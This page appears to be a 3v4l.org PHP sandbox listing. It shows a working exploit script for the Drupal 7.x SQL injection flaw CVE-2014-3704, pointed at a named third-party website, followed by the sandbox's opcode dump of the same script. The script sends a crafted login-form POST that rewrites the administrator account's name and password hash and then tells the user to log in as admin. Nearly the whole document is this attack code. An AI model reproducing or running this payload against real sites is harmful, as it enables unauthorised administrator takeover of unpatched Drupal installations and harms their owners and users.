3v4l.org

run code in 300+ PHP versions simultaneously
<?php #-----------------------------------------------------------------------------# # Exploit Title: Drupal core 7.x - SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #-----------------------------------------------------------------------------# $url = 'http://animepavilion.com/drupal/'; $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; $params = array( 'http' => array( 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $post_data ) ); $ctx = stream_context_create($params); $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { echo "Success! Log in with username admin and password admin at {$url}user/login"; } else { echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; }
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 28, Position 2 = 29
Branch analysis from position: 28
2 jumps found. (Code = 43) Position 1 = 30, Position 2 = 35
Branch analysis from position: 30
1 jumps found. (Code = 42) Position 1 = 36
Branch analysis from position: 36
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 35
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 29
filename:       /in/c62Io
function name:  (null)
number of ops:  37
compiled vars:  !0 = $url, !1 = $post_data, !2 = $params, !3 = $ctx, !4 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   11     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fanimepavilion.com%2Fdrupal%2F'
   12     1        INIT_FCALL                                               'urlencode'
          2        SEND_VAL                                                 '%24S%24CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g'
          3        DO_ICALL                                         $6      
          4        CONCAT                                           ~7      'name%5B0%2520%3Bupdate%2Busers%2Bset%2Bname%253D%27admin%27%2B%2C%2Bpass%2B%253d%2B%27', $6
          5        CONCAT                                           ~8      ~7, '%27%2Bwhere%2Buid%2B%253D%2B%271%27%3B%3B%23%2520%2520%5D%3Dtest3%26name%5B0%5D%3Dtest%26pass%3Dtest%26test2%3Dtest%26form_build_id%3D%26form_id%3Duser_login_block%26op%3DLog%2Bin'
          6        ASSIGN                                                   !1, ~8
   16     7        INIT_ARRAY                                       ~10     'POST', 'method'
   17     8        ADD_ARRAY_ELEMENT                                ~10     'Content-Type%3A+application%2Fx-www-form-urlencoded%0D%0A', 'header'
   18     9        ADD_ARRAY_ELEMENT                                ~10     !1, 'content'
         10        INIT_ARRAY                                       ~11     ~10, 'http'
   14    11        ASSIGN                                                   !2, ~11
   21    12        INIT_FCALL                                               'stream_context_create'
         13        SEND_VAR                                                 !2
         14        DO_ICALL                                         $13     
         15        ASSIGN                                                   !3, $13
   22    16        INIT_FCALL                                               'file_get_contents'
         17        CONCAT                                           ~15     !0, '%3Fq%3Dnode%26destination%3Dnode'
         18        SEND_VAL                                                 ~15
         19        SEND_VAL                                                 null
         20        SEND_VAR                                                 !3
         21        DO_ICALL                                         $16     
         22        ASSIGN                                                   !4, $16
   24    23        INIT_FCALL                                               'stristr'
         24        SEND_VAR                                                 !4
         25        SEND_VAL                                                 'mb_strlen%28%29+expects+parameter+1+to+be+string'
         26        DO_ICALL                                         $18     
         27      > JMPZ_EX                                          ~19     $18, ->29
         28    >   BOOL                                             ~19     !4
         29    > > JMPZ                                                     ~19, ->35
   25    30    >   ROPE_INIT                                     3  ~21     'Success%21+Log+in+with+username+admin+and+password+admin+at+'
         31        ROPE_ADD                                      1  ~21     ~21, !0
         32        ROPE_END                                      2  ~20     ~21, 'user%2Flogin'
         33        ECHO                                                     ~20
         34      > JMP                                                      ->36
   27    35    >   ECHO                                                     'Error%21+Either+the+website+isn%27t+vulnerable%2C+or+your+Internet+isn%27t+working.+'
   28    36    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
158.3 ms | 1392 KiB | 21 Q